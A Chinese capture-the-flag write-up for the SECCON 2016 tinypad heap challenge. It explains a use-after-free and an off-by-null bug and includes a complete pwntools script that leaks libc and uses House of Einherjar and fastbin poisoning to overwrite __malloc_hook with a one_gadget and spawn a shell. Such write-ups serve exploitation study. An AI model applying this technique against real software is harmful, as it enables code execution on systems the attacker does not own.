文件：https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/house-of-einherjar/2016_seccon_tinypad

checksec下：

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序操作

添加memo：    申请的大小范围：1 - 0x100
删除memo：    存在UAF
编辑memo：

使用read_until函数读取memo内容，该函数有off-by-null

程序数据存储：

tinypad+256起存储memos
每个memo是0x10字节：
    8字节：memo长度
    8字节：指向memo内容

pwn脚本

思路：通过off-by-null，利用House of Einherjar构造overlapping chunk，再覆盖fast chunk的fd指针，指向__malloc_hook附近，将__malloc_hook覆盖成one_gadget。

tinypad_pwn.py：

# -*-coding:utf-8-*-
from pwn import *
import pdb

# context.log_level = "debug"

def add_memo(p, size, content):
    p.recvuntil("(CMD)>>>")
    p.sendline("A")
    p.recvuntil("(SIZE)>>>")
    p.sendline(str(size))
    p.recvuntil("(CONTENT)>>>")
    p.sendline(content)

def delete_memo(p, idx):
    p.recvuntil("(CMD)>>>")
    p.sendline("D")
    p.recvuntil("(INDEX)>>>")
    p.sendline(str(idx))

def edit_memo(p, idx, content):
    p.recvuntil("(CMD)>>>")
    p.sendline("E")
    p.recvuntil("(INDEX)>>>")
    p.sendline(str(idx))
    p.recvuntil("(CONTENT)>>>")
    p.sendline(content)
    p.recvuntil("(Y/n)>>>")
    p.sendline("Y")


p = process("./tinypad")

# 第一步： 利用UAF泄露heap地址和libc基址
add_memo(p, 0x60, "A" * 0x10) # fast chunk
add_memo(p, 0x60, "B" * 0x10) # fast chunk
add_memo(p, 0xf0, "C" * 0x10) # unsorted chunk
add_memo(p, 0x80, "D" * 0x10)

delete_memo(p, 3)
delete_memo(p, 2)
delete_memo(p, 1)

p.recvuntil("INDEX: 1")
p.recvuntil("CONTENT: ")
addr_heap = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_heap: " + hex(addr_heap))

p.recvuntil("INDEX: 3")
p.recvuntil("CONTENT: ")
addr_unsorted_bin = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_unsorted_bin: " + hex(addr_unsorted_bin))
addr_libc = addr_unsorted_bin - 0x3c4b78  # Fix You
log.success("addr_libc: " + hex(addr_libc))
addr_malloc_hook = addr_libc + 0x3C4B10  # Fix You
addr_fake_fastchunk = addr_malloc_hook - 0x23
one_gadget = addr_libc + 0xf1147  # 该one_gadget需满足[rsp+0x70] == NULL   # Fix You

# 第二步： 利用House Of Einherjar构造overlapping chunk
add_memo(p, 0xf0, "C" * 0x10)  # use unsorted chunk (index: 1)
add_memo(p, 0x60, p64(0) + p64(0xd0) + p64(addr_heap - 0x60) + p64(addr_heap - 0x60))  # fake chunk (index: 2)
add_memo(p, 0x68, "B" * 0x60 + p64(0xd0))  # off-by-one (index: 3, will be overlapping chunk)
'''此时堆从低地址到高地址的分布：  
fake chunk                  --   AAAA  ----  (index: 2)
用于执行off-by-one的chunk     --   BBBB  ----  (index: 3)
用于free的chunk              --   CCCC  ----  (index: 1)
靠top chunk的chunk           --   DDDD  ----  (index: 4)
'''

delete_memo(p, 1)  # free to consolidate backward
delete_memo(p, 3)  # add this overlapping chunk to fastbin

# 第三步： 覆盖fastbin上的chunk的fd指针，指向__malloc_hook附近区域
add_memo(p, 0x90, "E" * 0x50 + p64(0) + p64(0x71) + p64(addr_fake_fastchunk)) # (index: 1)

'''
因为最多只能有4个memo，这里需要删除一个，后面才能申请到两个memo
这里不能调delete_memo(p, 4)， 因为要释放调这个靠top chunk的chunk，其会跟top chunk合并，下面的size变量会加上top chunk的大小，从而满足下面的条件
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
  if (have_fastchunks(av))
malloc_consolidate(av);
...
}
就会调用到malloc_consolidate函数。而在这个函数里处理fastbin chunk时会调用到unlink，而unlink时会检查被unlink的chunk的size和prev_size，这个检查通不过。
'''
delete_memo(p, 1) 

add_memo(p, 0x60, "F" * 0x10) # (index: 1)
add_memo(p, 0x60, "X" * (addr_malloc_hook - addr_fake_fastchunk - 0x10) + p64(one_gadget)) # (index: 2)


# 第四步： 调用malloc， 触发one_gadget
delete_memo(p, 2)
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(0x10))


p.interactive()

运行上面的脚本前需根据自己的libc版本来修改几个硬编码值，脚本里用Fix You标注出。
附：这里有个思路是跟上面稍微有些不同